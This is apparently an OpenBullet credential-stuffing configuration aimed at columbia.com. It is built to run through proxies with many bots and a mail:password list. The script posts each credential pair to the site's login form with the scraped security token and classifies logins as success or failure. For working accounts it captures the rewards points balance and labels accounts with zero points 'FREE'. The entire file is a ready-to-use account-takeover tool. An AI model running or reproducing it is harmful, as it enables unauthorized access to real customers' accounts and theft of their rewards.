[SETTINGS]
{
  "Name": "Columbia",
  "SuggestedBots": 100,
  "LastModified": "2019-04-25T22:45:17.2209616-05:00",
  "AdditionalInfo": "",
  "Author": "FFaez1267",
  "Version": "1.0.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.columbia.com/account" 
  
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 

PARSE "<SOURCE>" CSS "[name=dwfrm_login_securekey]" "value" -> VAR "TOKEN" 

PARSE "<SOURCE>" LR "account?dwcont=" "\"" -> VAR "D" 

REQUEST POST "https://www.columbia.com/account?dwcont=<D>" 
  CONTENT "dwfrm_login_username_d0mqykafpfur=<USER>&dwfrm_login_password=<PASS>&dwfrm_login_securekey=<TOKEN>&dwfrm_login_login=Login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "referer: https://www.columbia.com/account" 
  HEADER "origin: https://www.columbia.com" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Sorry, this does not match our records. Check your spelling and try again" 
    KEY "If you are a registered user, please enter your email and password." 
  KEYCHAIN Success OR 
    KEY "Sign Out" 

REQUEST GET "https://www.columbia.com/rewards-activity" 
  
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 

PARSE "<SOURCE>" LR "						<div class=\"value\">" "</div>" -> CAP "POINTS" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<POINTS>" EqualTo "0" 

